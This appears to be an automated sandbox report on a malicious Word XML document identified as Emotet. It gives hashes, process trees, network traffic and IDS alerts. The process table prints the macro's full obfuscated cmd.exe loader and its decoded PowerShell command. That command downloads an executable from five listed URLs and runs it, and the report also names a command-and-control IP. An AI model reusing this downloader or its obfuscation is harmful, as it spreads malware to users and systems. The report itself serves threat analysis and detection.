File name: | 05616586598.doc |
Full analysis: | https://app.any.run/tasks/7e26b191-e886-4845-bbdc-29dfefe421dc |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 22, 2019, 15:14:48 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | DF1B636312F266DFD19EF1E99F388B81 |
SHA1: | 778CFAE5B20EFB29B3DD837CA7191315F298C3D1 |
SHA256: | 81A1837A1F222BEE32C84622BF0AAED551D08644F68AA3209EC3DB35696BBEB1 |
SSDEEP: | 3072:uFntGJpjL/xSu90OoiLuDKZXfwKeljR1z:uJEhxUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentMacrosPresent: | yes |
---|---|
WordDocumentEmbeddedObjPresent: | no |
WordDocumentOcxPresent: | no |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 13:10:00Z |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 13:10:00Z |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentDocSuppDataBinData: | (base64-encoded binary data omitted) |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentDocPrViewVal: | |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 00200428 |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentBodySectPRsidRDefault: | 00200428 |
WordDocumentBodySectPRRsidRPr: | 0038126B |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2976 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\05616586598.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4044 | c:\w4537\d5871\t6947\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!|cmd" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2608 | CmD /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!|cmd" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2640 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2760 | cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3172 | powershell $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3504 | "C:\Users\admin\AppData\Local\Temp\269.exe" | C:\Users\admin\AppData\Local\Temp\269.exe | — | powershell.exe |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
2468 | "C:\Users\admin\AppData\Local\Temp\269.exe" | C:\Users\admin\AppData\Local\Temp\269.exe | 269.exe | |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
296 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 269.exe |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69 | ||||
2824 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Version: 3.0.69 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE8FC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15537A9C.jpg | — | |
MD5:— | SHA256:— | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ETA1VRVI8LW1303ZQQ7R.temp | — | |
MD5:— | SHA256:— | |||
3172 | powershell.exe | C:\Users\admin\AppData\Local\Temp\269.exe | — | |
MD5:— | SHA256:— | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:E06109969FEBE50C3AE71B5B04150D54 | SHA256:347F2E6A51A90F23672DD1432113232728893CF9AC1E28D88F701F2A6A923FCE | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:5668E0BECA7260FE57640A54FBAEC98C | SHA256:F31166347156B1F55AC9D8543E3751068AAE8BB7A649F271617CCF59E1E3BEBA | |||
2468 | 269.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:69A348DF3D2DD26C01B0D943014A3681 | SHA256:E2336EB2A1DB7A170E0790DC5A0E1F0CF9CEDD76EAB4842AD7424A5CFA3CB569 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$616586598.doc | pgc | |
MD5:BA8DFD296864750F0DB790346614E69E | SHA256:ED78B104B33BDD32D3E811C2402ACC901A802A24C95C510C28A87487B9DE3399 | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f90a.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3172 | powershell.exe | GET | 301 | 192.185.52.164:80 | http://ahluniversity.com/lW8Z9O0kOlt | US | html | 312 b | malicious |
3172 | powershell.exe | GET | 200 | 192.185.52.164:80 | http://ahluniversity.com/lW8Z9O0kOlt/ | US | html | 506 b | malicious |
3172 | powershell.exe | GET | 301 | 192.185.20.9:80 | http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu | US | html | 339 b | suspicious |
3172 | powershell.exe | GET | 200 | 192.185.20.9:80 | http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu/ | US | executable | 545 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2824 | wabmetagen.exe | 182.176.106.43:995 | — | Pakistan Telecom Company Limited | PK | malicious |
3172 | powershell.exe | 192.185.52.164:80 | ahluniversity.com | CyrusOne LLC | US | malicious |
3172 | powershell.exe | 192.185.20.9:80 | www.megafighton.sandboxph.com | CyrusOne LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
ahluniversity.com | | malicious |
www.megafighton.sandboxph.com | | suspicious |
dns.msftncsi.com | | shared |
PID | Process | Class | Message |
---|---|---|---|
3172 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3172 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3172 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3172 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3172 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |